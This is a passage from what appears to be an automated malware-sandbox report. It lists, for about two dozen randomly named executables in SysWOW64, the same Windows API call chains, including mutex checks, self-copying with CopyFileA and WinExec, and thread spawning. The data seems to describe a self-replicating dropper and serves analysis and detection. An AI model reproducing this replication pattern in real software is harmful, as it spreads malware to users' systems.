                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_0040129B DsBindWithCredA,CreateFileA,2_2_0040129B
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,2_2_0040129C
                      Source: C:\Windows\SysWOW64\Ogjdllpi.exeCode function: 2_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,2_2_00406753
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,3_2_00403619
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,3_2_00406C29
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_0040129B DsBindWithCredA,CreateFileA,3_2_0040129B
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,3_2_0040129C
                      Source: C:\Windows\SysWOW64\Opbieagi.exeCode function: 3_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,3_2_00406753
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,4_2_00403619
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,4_2_00406C29
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_0040129B DsBindWithCredA,CreateFileA,4_2_0040129B
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,4_2_0040129C
                      Source: C:\Windows\SysWOW64\Oglabl32.exeCode function: 4_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,4_2_00406753
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,5_2_00403619
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,5_2_00406C29
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_0040129B DsBindWithCredA,CreateFileA,5_2_0040129B
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,5_2_0040129C
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 5_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,5_2_00406753
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,6_2_00403619
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,6_2_00406C29
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_0040129B DsBindWithCredA,CreateFileA,6_2_0040129B
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,6_2_0040129C
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 6_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,6_2_00406753
Source: C:\Windows\SysWOW64\Oceoll32.exe, Code function: 7_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,7_2_00403619
Source: C:\Windows\SysWOW64\Oceoll32.exe, Code function: 7_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,7_2_00406C29
Source: C:\Windows\SysWOW64\Oceoll32.exe, Code function: 7_2_0040129B DsBindWithCredA,CreateFileA,7_2_0040129B
Source: C:\Windows\SysWOW64\Oceoll32.exe, Code function: 7_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,7_2_0040129C
Source: C:\Windows\SysWOW64\Oceoll32.exe, Code function: 7_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,7_2_00406753
Source: C:\Windows\SysWOW64\Onkcje32.exe, Code function: 8_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,8_2_00403619
Source: C:\Windows\SysWOW64\Onkcje32.exe, Code function: 8_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,8_2_00406C29
Source: C:\Windows\SysWOW64\Onkcje32.exe, Code function: 8_2_0040129B DsBindWithCredA,CreateFileA,8_2_0040129B
Source: C:\Windows\SysWOW64\Onkcje32.exe, Code function: 8_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,8_2_0040129C
Source: C:\Windows\SysWOW64\Onkcje32.exe, Code function: 8_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,8_2_00406753
Source: C:\Windows\SysWOW64\Odekfoij.exe, Code function: 9_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,9_2_00403619
Source: C:\Windows\SysWOW64\Odekfoij.exe, Code function: 9_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,9_2_00406C29
Source: C:\Windows\SysWOW64\Odekfoij.exe, Code function: 9_2_0040129B DsBindWithCredA,CreateFileA,9_2_0040129B
Source: C:\Windows\SysWOW64\Odekfoij.exe, Code function: 9_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,9_2_0040129C
Source: C:\Windows\SysWOW64\Odekfoij.exe, Code function: 9_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,9_2_00406753
Source: C:\Windows\SysWOW64\Ojacofgb.exe, Code function: 10_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,10_2_00403619
Source: C:\Windows\SysWOW64\Ojacofgb.exe, Code function: 10_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,10_2_00406C29
Source: C:\Windows\SysWOW64\Ojacofgb.exe, Code function: 10_2_0040129B DsBindWithCredA,CreateFileA,10_2_0040129B
Source: C:\Windows\SysWOW64\Ojacofgb.exe, Code function: 10_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,10_2_0040129C
Source: C:\Windows\SysWOW64\Ojacofgb.exe, Code function: 10_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,10_2_00406753
Source: C:\Windows\SysWOW64\Ppllkpoo.exe, Code function: 11_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,11_2_00403619
Source: C:\Windows\SysWOW64\Ppllkpoo.exe, Code function: 11_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,11_2_00406C29
Source: C:\Windows\SysWOW64\Ppllkpoo.exe, Code function: 11_2_0040129B DsBindWithCredA,CreateFileA,11_2_0040129B
Source: C:\Windows\SysWOW64\Ppllkpoo.exe, Code function: 11_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,11_2_0040129C
Source: C:\Windows\SysWOW64\Ppllkpoo.exe, Code function: 11_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,11_2_00406753
Source: C:\Windows\SysWOW64\Plbmqa32.exe, Code function: 12_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,12_2_00403619
Source: C:\Windows\SysWOW64\Plbmqa32.exe, Code function: 12_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,12_2_00406C29
Source: C:\Windows\SysWOW64\Plbmqa32.exe, Code function: 12_2_0040129B DsBindWithCredA,CreateFileA,12_2_0040129B
Source: C:\Windows\SysWOW64\Plbmqa32.exe, Code function: 12_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,12_2_0040129C
Source: C:\Windows\SysWOW64\Plbmqa32.exe, Code function: 12_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,12_2_00406753
Source: C:\Windows\SysWOW64\Plgflqpn.exe, Code function: 13_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,13_2_00403619
Source: C:\Windows\SysWOW64\Plgflqpn.exe, Code function: 13_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,13_2_00406C29
Source: C:\Windows\SysWOW64\Plgflqpn.exe, Code function: 13_2_0040129B DsBindWithCredA,CreateFileA,13_2_0040129B
Source: C:\Windows\SysWOW64\Plgflqpn.exe, Code function: 13_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,13_2_0040129C
Source: C:\Windows\SysWOW64\Plgflqpn.exe, Code function: 13_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,13_2_00406753
Source: C:\Windows\SysWOW64\Pqeoao32.exe, Code function: 14_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,14_2_00403619
Source: C:\Windows\SysWOW64\Pqeoao32.exe, Code function: 14_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,14_2_00406C29
Source: C:\Windows\SysWOW64\Pqeoao32.exe, Code function: 14_2_0040129B DsBindWithCredA,CreateFileA,14_2_0040129B
Source: C:\Windows\SysWOW64\Pqeoao32.exe, Code function: 14_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,14_2_0040129C
Source: C:\Windows\SysWOW64\Pqeoao32.exe, Code function: 14_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,14_2_00406753
Source: C:\Windows\SysWOW64\Qgcpihjl.exe, Code function: 15_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,15_2_00403619
Source: C:\Windows\SysWOW64\Qgcpihjl.exe, Code function: 15_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,15_2_00406C29
Source: C:\Windows\SysWOW64\Qgcpihjl.exe, Code function: 15_2_0040129B DsBindWithCredA,CreateFileA,15_2_0040129B
Source: C:\Windows\SysWOW64\Qgcpihjl.exe, Code function: 15_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,15_2_0040129C
Source: C:\Windows\SysWOW64\Qgcpihjl.exe, Code function: 15_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,15_2_00406753
Source: C:\Windows\SysWOW64\Ajkolbad.exe, Code function: 16_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,16_2_00403619
Source: C:\Windows\SysWOW64\Ajkolbad.exe, Code function: 16_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,16_2_00406C29
Source: C:\Windows\SysWOW64\Ajkolbad.exe, Code function: 16_2_0040129B DsBindWithCredA,CreateFileA,16_2_0040129B
Source: C:\Windows\SysWOW64\Ajkolbad.exe, Code function: 16_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,16_2_0040129C
Source: C:\Windows\SysWOW64\Ajkolbad.exe, Code function: 16_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,16_2_00406753
Source: C:\Windows\SysWOW64\Bmlhnnne.exe, Code function: 17_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,17_2_00403619
Source: C:\Windows\SysWOW64\Bmlhnnne.exe, Code function: 17_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,17_2_00406C29
Source: C:\Windows\SysWOW64\Bmlhnnne.exe, Code function: 17_2_0040129B DsBindWithCredA,CreateFileA,17_2_0040129B
Source: C:\Windows\SysWOW64\Bmlhnnne.exe, Code function: 17_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,17_2_0040129C
Source: C:\Windows\SysWOW64\Bmlhnnne.exe, Code function: 17_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,17_2_00406753
Source: C:\Windows\SysWOW64\Bgamkfnl.exe, Code function: 18_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,18_2_00403619
Source: C:\Windows\SysWOW64\Bgamkfnl.exe, Code function: 18_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,18_2_00406C29
Source: C:\Windows\SysWOW64\Bgamkfnl.exe, Code function: 18_2_0040129B DsBindWithCredA,CreateFileA,18_2_0040129B
Source: C:\Windows\SysWOW64\Bgamkfnl.exe, Code function: 18_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,18_2_0040129C
Source: C:\Windows\SysWOW64\Bgamkfnl.exe, Code function: 18_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,18_2_00406753
Source: C:\Windows\SysWOW64\Bqjacldl.exe, Code function: 19_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,19_2_00403619
Source: C:\Windows\SysWOW64\Bqjacldl.exe, Code function: 19_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,19_2_00406C29
Source: C:\Windows\SysWOW64\Bqjacldl.exe, Code function: 19_2_0040129B DsBindWithCredA,CreateFileA,19_2_0040129B
Source: C:\Windows\SysWOW64\Bqjacldl.exe, Code function: 19_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,19_2_0040129C
Source: C:\Windows\SysWOW64\Bqjacldl.exe, Code function: 19_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,19_2_00406753
Source: C:\Windows\SysWOW64\Bnnampcf.exe, Code function: 20_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,20_2_00403619
Source: C:\Windows\SysWOW64\Bnnampcf.exe, Code function: 20_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,20_2_00406C29
Source: C:\Windows\SysWOW64\Bnnampcf.exe, Code function: 20_2_0040129B DsBindWithCredA,CreateFileA,20_2_0040129B
Source: C:\Windows\SysWOW64\Bnnampcf.exe, Code function: 20_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,20_2_0040129C
Source: C:\Windows\SysWOW64\Bnnampcf.exe, Code function: 20_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,20_2_00406753
Source: C:\Windows\SysWOW64\Bnpnbp32.exe, Code function: 21_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,21_2_00403619
Source: C:\Windows\SysWOW64\Bnpnbp32.exe, Code function: 21_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,21_2_00406C29
Source: C:\Windows\SysWOW64\Bnpnbp32.exe, Code function: 21_2_0040129B DsBindWithCredA,CreateFileA,21_2_0040129B
Source: C:\Windows\SysWOW64\Bnpnbp32.exe, Code function: 21_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,21_2_0040129C
Source: C:\Windows\SysWOW64\Bnpnbp32.exe, Code function: 21_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,21_2_00406753
Source: C:\Windows\SysWOW64\Bgibkegc.exe, Code function: 22_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,22_2_00403619
Source: C:\Windows\SysWOW64\Bgibkegc.exe, Code function: 22_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,22_2_00406C29
Source: C:\Windows\SysWOW64\Bgibkegc.exe, Code function: 22_2_0040129B DsBindWithCredA,CreateFileA,22_2_0040129B
Source: C:\Windows\SysWOW64\Bgibkegc.exe, Code function: 22_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,22_2_0040129C
Source: C:\Windows\SysWOW64\Bgibkegc.exe, Code function: 22_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,22_2_00406753
Source: C:\Windows\SysWOW64\Baagdk32.exe, Code function: 23_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,23_2_00403619
Source: C:\Windows\SysWOW64\Baagdk32.exe, Code function: 23_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,23_2_00406C29
Source: C:\Windows\SysWOW64\Baagdk32.exe, Code function: 23_2_0040129B DsBindWithCredA,CreateFileA,23_2_0040129B
Source: C:\Windows\SysWOW64\Baagdk32.exe, Code function: 23_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,23_2_0040129C
Source: C:\Windows\SysWOW64\Baagdk32.exe, Code function: 23_2_00406753 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,CloseHandle,VirtualAlloc,VirtualAlloc,VirtualAlloc,23_2_00406753
Source: C:\Windows\SysWOW64\Cfnpmb32.exe, Code function: 24_2_00403619 DsBindWithCredA,DsBindWithCredA,CreateFileA,GetFileSize,LocalAlloc,ReadFile,CloseHandle,24_2_00403619
Source: C:\Windows\SysWOW64\Cfnpmb32.exe, Code function: 24_2_00406C29 OpenMutexA,CloseHandle,exit,GetVersionExA,GetSystemDirectoryA,GetTickCount,srand,GetModuleFileNameA,rand,rand,rand,sprintf,CopyFileA,WinExec,ExitProcess,sprintf,sprintf,sprintf,LoadCursorA,LoadIconA,GetStockObject,DsBindWithCredA,RegisterClassA,CreateWindowExA,CreateMutexA,GetVersion,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,CreateThread,CloseHandle,CreateThread,CloseHandle,SetTimer,TranslateMessage,DispatchMessageA,GetMessageA,24_2_00406C29
Source: C:\Windows\SysWOW64\Cfnpmb32.exe, Code function: 24_2_0040129B DsBindWithCredA,CreateFileA,24_2_0040129B
Source: C:\Windows\SysWOW64\Cfnpmb32.exe, Code function: 24_2_0040129C DsBindWithCredA,CreateFileA,ReadFile,CloseHandle,24_2_0040129C
